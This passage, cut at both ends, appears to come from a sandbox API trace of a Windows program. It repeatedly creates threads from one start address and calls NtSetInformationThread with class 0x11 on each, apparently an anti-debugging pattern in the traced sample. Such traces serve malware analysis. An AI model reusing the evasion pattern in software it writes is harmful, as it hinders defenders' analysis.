SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5b4, lpBytesBuffer=0x0) returned 0x0 [0090.745] NtSetInformationThread (ThreadHandle=0x5b4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.745] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5b8, lpBytesBuffer=0x0) returned 0x0 [0090.746] NtSetInformationThread (ThreadHandle=0x5b8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.746] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5bc, lpBytesBuffer=0x0) returned 0x0 [0090.747] NtSetInformationThread (ThreadHandle=0x5bc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.747] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5c0, lpBytesBuffer=0x0) returned 0x0 [0090.748] NtSetInformationThread (ThreadHandle=0x5c0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.748] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5c4, lpBytesBuffer=0x0) returned 0x0 [0090.748] NtSetInformationThread (ThreadHandle=0x5c4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.748] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5c8, lpBytesBuffer=0x0) returned 0x0 [0090.749] NtSetInformationThread (ThreadHandle=0x5c8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.749] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5cc, lpBytesBuffer=0x0) returned 0x0 [0090.750] NtSetInformationThread (ThreadHandle=0x5cc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.750] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5d0, lpBytesBuffer=0x0) returned 0x0 [0090.751] NtSetInformationThread (ThreadHandle=0x5d0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.751] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5d4, lpBytesBuffer=0x0) returned 0x0 [0090.752] NtSetInformationThread (ThreadHandle=0x5d4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.752] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5d8, lpBytesBuffer=0x0) returned 0x0 [0090.752] NtSetInformationThread (ThreadHandle=0x5d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.753] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5dc, lpBytesBuffer=0x0) returned 0x0 [0090.753] NtSetInformationThread (ThreadHandle=0x5dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.753] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5e0, lpBytesBuffer=0x0) returned 0x0 [0090.754] NtSetInformationThread (ThreadHandle=0x5e0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.754] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5e4, lpBytesBuffer=0x0) returned 0x0 [0090.754] NtSetInformationThread (ThreadHandle=0x5e4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.755] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5e8, lpBytesBuffer=0x0) returned 0x0 [0090.755] NtSetInformationThread (ThreadHandle=0x5e8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.755] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5ec, lpBytesBuffer=0x0) returned 0x0 [0090.756] NtSetInformationThread (ThreadHandle=0x5ec, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.756] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5f0, lpBytesBuffer=0x0) returned 0x0 [0090.756] NtSetInformationThread (ThreadHandle=0x5f0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.757] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5f4, lpBytesBuffer=0x0) returned 0x0 [0090.757] NtSetInformationThread (ThreadHandle=0x5f4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.757] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5f8, lpBytesBuffer=0x0) returned 0x0 [0090.758] NtSetInformationThread (ThreadHandle=0x5f8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.758] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5fc, lpBytesBuffer=0x0) returned 0x0 [0090.758] NtSetInformationThread (ThreadHandle=0x5fc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.759] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x600, lpBytesBuffer=0x0) returned 0x0 [0090.759] NtSetInformationThread (ThreadHandle=0x600, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.759] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x604, lpBytesBuffer=0x0) returned 0x0 [0090.760] NtSetInformationThread (ThreadHandle=0x604, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.760] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x608, lpBytesBuffer=0x0) returned 0x0 [0090.761] NtSetInformationThread (ThreadHandle=0x608, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.761] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x60c, lpBytesBuffer=0x0) returned 0x0 [0090.761] NtSetInformationThread (ThreadHandle=0x60c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.761] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x610, lpBytesBuffer=0x0) returned 0x0 [0090.762] NtSetInformationThread (ThreadHandle=0x610, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.762] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x614, lpBytesBuffer=0x0) returned 0x0 [0090.762] NtSetInformationThread (ThreadHandle=0x614, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.762] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x618, lpBytesBuffer=0x0) returned 0x0 [0090.763] NtSetInformationThread (ThreadHandle=0x618, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.763] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x61c, lpBytesBuffer=0x0) returned 0x0 [0090.764] NtSetInformationThread (ThreadHandle=0x61c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.764] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x620, lpBytesBuffer=0x0) returned 0x0 [0090.764] NtSetInformationThread (ThreadHandle=0x620, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.764] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x624, lpBytesBuffer=0x0) returned 0x0 [0090.765] NtSetInformationThread (ThreadHandle=0x624, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.765] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x628, lpBytesBuffer=0x0) returned 0x0 [0090.766] NtSetInformationThread (ThreadHandle=0x628, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.766] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x62c, lpBytesBuffer=0x0) returned 0x0 [0090.766] NtSetInformationThread (ThreadHandle=0x62c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.766] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x630, lpBytesBuffer=0x0) returned 0x0 [0090.767] NtSetInformationThread (ThreadHandle=0x630, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.767] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x634, lpBytesBuffer=0x0) returned 0x0 [0090.768] NtSetInformationThread (ThreadHandle=0x634, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.768] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x638, lpBytesBuffer=0x0) returned 0x0 [0090.769] NtSetInformationThread (ThreadHandle=0x638, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.769] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x63c, lpBytesBuffer=0x0) returned 0x0 [0090.769] NtSetInformationThread (ThreadHandle=0x63c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.769] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x640, lpBytesBuffer=0x0) returned 0x0 [0090.770] NtSetInformationThread (ThreadHandle=0x640, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.770] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x644, lpBytesBuffer=0x0) returned 0x0 [0090.771] NtSetInformationThread (ThreadHandle=0x644, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.771] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x648, lpBytesBuffer=0x0) returned 0x0 [0090.772] NtSetInformationThread (ThreadHandle=0x648, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.772] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x64c, lpBytesBuffer=0x0) returned 0x0 [0090.772] NtSetInformationThread (ThreadHandle=0x64c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.772] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x650, lpBytesBuffer=0x0) returned 0x0 [0090.773] NtSetInformationThread (ThreadHandle=0x650, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.773] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x654, lpBytesBuffer=0x0) returned 0x0 [0090.774] NtSetInformationThread (ThreadHandle=0x654, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.774] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x658, lpBytesBuffer=0x0) returned 0x0 [0090.774] NtSetInformationThread (ThreadHandle=0x658, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.775] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x65c, lpBytesBuffer=0x0) returned 0x0 [0090.775] NtSetInformationThread (ThreadHandle=0x65c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.775] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x660, lpBytesBuffer=0x0) returned 0x0 [0090.776] NtSetInformationThread (ThreadHandle=0x660, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.776] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x664, lpBytesBuffer=0x0) returned 0x0 [0090.776] NtSetInformationThread (ThreadHandle=0x664, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.776] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x668, lpBytesBuffer=0x0) returned 0x0 [0090.777] NtSetInformationThread (ThreadHandle=0x668, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.777] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x66c, lpBytesBuffer=0x0) returned 0x0 [0090.778] NtSetInformationThread (ThreadHandle=0x66c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.778] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x670, lpBytesBuffer=0x0) returned 0x0 [0090.778] NtSetInformationThread (ThreadHandle=0x670, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.778] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x674, lpBytesBuffer=0x0) returned 0x0 [0090.780] NtSetInformationThread (ThreadHandle=0x674, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.780] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x678, lpBytesBuffer=0x0) returned 0x0 [0090.781] NtSetInformationThread (ThreadHandle=0x678, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.781] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x67c, lpBytesBuffer=0x0) returned 0x0 [0090.782] NtSetInformationThread (ThreadHandle=0x67c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.782] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x680, lpBytesBuffer=0x0) returned 0x0 [0090.783] NtSetInformationThread (ThreadHandle=0x680, ThreadInformationClass=0x11, 